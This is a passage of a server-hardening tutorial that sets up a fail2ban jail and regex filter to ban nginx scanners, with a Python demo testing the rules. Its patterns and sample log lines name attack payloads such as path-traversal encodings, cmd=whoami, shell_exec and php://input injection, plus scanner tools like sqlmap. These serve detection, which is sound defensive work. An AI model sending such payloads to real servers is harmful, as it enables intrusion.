vim /etc/fail2ban/jail.d/nginx-malicious.conf

Paste the following:

[nginx-malicious]
enabled = true
filter = nginx-malicious
logpath = /var/log/nginx/access.log
maxretry = 1
findtime = 600
bantime = 1728000
action = iptables-ipset-proto4[name=nginx-malicious]

Create the failregex filter

vim /etc/fail2ban/filter.d/nginx-malicious.conf

Paste the following:

[Definition]
# fail2ban reads this file with ConfigParser interpolation, so a literal percent
# sign must be written as %% (e.g. %%2e matches the text %2e in the log).
failregex =
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*/(\.env|api|webui|HNAP1|phpmyadmin|actuator|geoserver|\.git|\.svn|\.sql|\.tar\.gz|\.bak|\.old|\.DS_Store|admin|config|login|debug|shell|test|hidden|\.well-known|setup).*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*"[^"]*(curl|python|aiohttp|GPTBot|scrapy|sqlmap|masscan|zgrab|nmap|scan|dirbuster|wafw00f|nikto|paloaltonetworks|mozi|bot|crawler|spider|AhrefsBot|SemrushBot|MJ12bot|DotBot|PetalBot|Bytespider)[^"]*" .*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*%%25[0-9A-Fa-f]{2}.* (200|301|302|400|403|404).*
    ^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*(\.\./|%%2e%%2e|%%32%%65|%%33%%32|%%2f).*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*cmd=.*(exec\||whoami|system\(|shell_exec|passthru|assert|base64_decode).*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*base64_decode.*" .*
    ^<HOST> - -.* "(GET|POST|HEAD).*eval\(|system\(|shell_exec\(|assert\(|passthru\(" .*
    ^<HOST> - - \[.*\] ".*" 400 .*
    ^<HOST> - - \[.*\] "PRI \* HTTP/2\.0" 400 .*
    ^<HOST> - - \[.*\] "[A-Z0-9_\.]+" 400 .*
    ^<HOST> - - \[.*\] "\s*" 400 .*
    ^<HOST> - - \[.*\] "SSH-2\.0-Go" 400 .*
    ^<HOST> - -.* "(GET|POST|HEAD) /(phpinfo|info|phpmyadmin|pma|admin|dbadmin|mysql|test|shell|cmd|backdoor|eval|upload|config|debug|x\.php|1\.php|password\.php|upl\.php|t4|geoip).*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(\?file=|\?path=|\?dir=|\?page=|\?url=|\?include=|\?inc=|\?require=).*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(http|https)://.*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) .*(\.\./|\.\\\.\\|%%2e%%2e|%%2f).*\.php.*" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) /.*/.*\.php(\?.*)? HTTP/1\.[01]" (200|301|302|403|404|400) .*
    ^<HOST> - -.* "(GET|POST|HEAD) /.*/.*\.php\.(jpg|png|gif|txt|bak|swp|save)" (200|301|302|403|404|400) .*
    ^<HOST> - - \[.*\] "GET / HTTP/1\.[01]" (200|301|302|403|404|400) "-" "-" "-"
    ^<HOST> - - \[.*\] "OPTIONS / HTTP/1\.0".*"-" "-" "-"$
    ^<HOST> - -.* "Mozilla/5\.0 zgrab/0\.x"
    ^<HOST> - .*"(GET|POST).*allow_url_include.*auto_prepend_file=php://input.*HTTP
    ^<HOST> - .*"[^"]*" [0-9]{3} .* "-" "libredtail-http"

ignoreregex =

Check a few things against your own traffic before enabling this filter. The keywords bot, crawler and spider also match Googlebot and Bingbot, so drop them if search indexing matters. The catch-all rule for any 400 response and the rule for a bare "GET /" with no referer and no User-Agent will also ban uptime checkers and any real client that once sends a malformed request. Rules keyed on /api, /login, /admin, /config or any *.php path will ban your own users if the site actually serves those paths. Write the User-Agent rule in substring form ("[^"]*(curl|...)[^"]*"): with the quotes hugging the keyword list, only a User-Agent that is literally sqlmap matches, and curl/7.29.0 or python-requests/2.32.4 slips through. Note also that the mixed .%2e/ form from the first log line matches none of the traversal patterns and is caught only by the generic 400 rule. With maxretry = 1 and a 20-day ban, run fail2ban-regex over a day of real log before enabling the jail and review what it matches.

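To see what these rules actually catch, here is an added example (my code, not part of the original post) that applies a handful of the failregex lines above to access-log entries the way fail2ban does: it expands `<HOST>` and turns the ConfigParser-escaped `%%` back into `%` before compiling, then reports which rule fires for each line. It puts the exact-match form of the user-agent rule, `"(curl|…)"`, which fires only when the whole User-Agent is a listed keyword, beside the substring form `"[^"]*(curl|…)[^"]*"`. The `<HOST>` stand-in is simplified, the path list is shortened, and the sample lines other than the two copied from the log are constructed for the demo.

```python
# Added example (mine, not from the original post): apply a handful of the
# failregex lines above to access-log entries the way fail2ban does (expand
# <HOST>, turn the ConfigParser-escaped %% back into %) and report which rule
# fires for each line. Two sample lines are copied from the log at the top of
# the post (shortened); the others are constructed for this demo.
import re
from typing import Dict, List, Optional

HOST = r"(?P<host>\S+)"  # simplified stand-in for fail2ban's <HOST> tag


def compile_failregex(rule: str) -> "re.Pattern[str]":
    """The two substitutions fail2ban applies before compiling a failregex."""
    return re.compile(rule.replace("%%", "%").replace("<HOST>", HOST))


# Rules in fail2ban filter syntax. "sensitive-path", "ua-exact", "traversal" and
# "any-400" follow the filter above (path list shortened); "ua-substring" is the
# corrected form of the user-agent rule and is my addition.
RULES: Dict[str, str] = {
    "sensitive-path": r'^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*/(\.env|api|webui|admin|config|login|shell|setup).*" (200|301|302|403|404|400) .*',
    # Exact-match form: the quotes hug the keyword, so only a User-Agent that is
    # literally "sqlmap" or "curl" matches; "curl/7.29.0" does not.
    "ua-exact": r'^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*"(curl|python|sqlmap|zgrab|bot|crawler)" .*',
    "traversal": r'^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE) .*(\.\./|%%2e%%2e|%%32%%65|%%33%%32|%%2f).*" .*',
    "any-400": r'^<HOST> - - \[.*\] ".*" 400 .*',
    # Substring form: [^"]* on both sides lets the keyword sit anywhere inside
    # the quoted User-Agent.
    "ua-substring": r'^<HOST> - -.* "(GET|POST|CONNECT|OPTIONS|HEAD|PUT|DELETE|TRACE).*" .*"[^"]*(curl|python|sqlmap|zgrab|bot|crawler)[^"]*" .*',
}
COMPILED = {name: compile_failregex(rx) for name, rx in RULES.items()}


def match_rules(line: str) -> List[str]:
    """Names of all rules that match the line (fail2ban itself stops at the first hit)."""
    return [name for name, rx in COMPILED.items() if rx.search(line)]


def banned_host(line: str) -> Optional[str]:
    """The <HOST> fail2ban would ban for this line, or None if no rule matches."""
    for rx in COMPILED.values():
        m = rx.search(line)
        if m:
            return m.group("host")
    return None


SAMPLES: Dict[str, str] = {
    # copied from the log above (double-encoded traversal, shortened to two segments)
    "traversal-double": '167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 150 "-" "-" "-"',
    # copied from the log above (mixed ".%2e/" traversal, shortened to three segments)
    "traversal-mixed": '167.172.89.156 - - [11/Aug/2025:11:52:38 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"',
    # constructed: versioned curl User-Agent, as real curl sends it
    "curl-versioned": '101.126.128.249 - - [11/Aug/2025:09:31:01 +0800] "GET /?cmd=whoami HTTP/1.1" 403 146 "-" "curl/7.29.0" "-"',
    # constructed: bare "sqlmap" User-Agent, like the post's verification command
    "sqlmap-exact": '101.126.128.249 - - [11/Aug/2025:08:54:59 +0800] "GET / HTTP/1.1" 403 146 "-" "sqlmap" "-"',
    # constructed: an ordinary browser visiting a real /login page
    "legit-login": '203.0.113.7 - - [12/Aug/2025:10:00:00 +0800] "GET /login HTTP/1.1" 200 2048 "https://example.test/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0" "-"',
}

if __name__ == "__main__":
    for label, line in SAMPLES.items():
        print(f"{label:18} host={banned_host(line)!s:16} rules={match_rules(line)}")
```

Three things the run shows: the double-encoded payload trips the traversal rule, but the mixed `.%2e/` payload is only caught by the generic 400 rule; `curl/7.29.0` is missed by the exact-match user-agent rule and caught by the substring form; and the browser visiting `/login` is banned by the sensitive-path rule, which is the false positive to watch for on a site that really has a login page.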
Restart Fail2Ban to apply the changes

systemctl enable --now fail2ban
systemctl status fail2ban

## or reload the configuration
fail2ban-client reload

Once it starts, iptables shows the matching rule; stopping the fail2ban service removes the rule automatically.

iptables -L -n

Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --  0.0.0.0/0            0.0.0.0/0            match-set nginx-malicious src

## ipset now has an automatically created nginx-malicious set
ipset list -name

nginx-malicious  ## the automatically created set

Verifying the result

To check that IPs really get banned, run the command below from a machine you do not mind locking out (maxretry = 1 and the 20-day ban apply to it too; put your own admin addresses in ignoreip in the jail first), then look at the fail2ban log, or run the command a second time: it will now time out.

curl -H "User-Agent: sqlmap" https://demo.com/
## list the banned IPs (the fail2ban command for this is shown below)
ipset list nginx-malicious

Common Fail2Ban commands

  • List all running jails:
fail2ban-client status

Example output (with one jail):

Status
|- Number of jail:      1
`- Jail list:           nginx-malicious

Fail2Ban manages the ipset set itself; use Fail2Ban's own commands to ban and unban so its state stays in sync with the set.

  • Ban an IP manually
fail2ban-client set nginx-malicious banip 1.2.3.4
  • Unban an IP manually
fail2ban-client set nginx-malicious unbanip 1.2.3.4

Test whether the fail2ban regex rules work

## Useful options:  --print-all-missed   print lines that matched nothing
##                  --print-all-matched  print lines that matched; append either to the end of the command
fail2ban-regex /var/log/nginx/access.log /etc/fail2ban/filter.d/nginx-malicious.conf

View the list of currently banned IPs

  • Via ipset (the set is named after the name= parameter passed to the action, nginx-malicious here):
ipset list nginx-malicious
  • Via Fail2Ban:
fail2ban-client status nginx-malicious

The output lists the IPs currently banned.

  • Sometimes fail2ban stops banning IPs, for example after the nginx log has been emptied with a command; fail2ban runs into trouble then. When that happens, do the following:
systemctl stop fail2ban

# This wipes the list of banned IPs (the ipset set is destroyed on stop as well)
## Save the current bans first: write the output of ipset list nginx-malicious to a file
rm -rf /var/lib/fail2ban/fail2ban.sqlite3
rm -rf /var/run/fail2ban/

systemctl start fail2ban
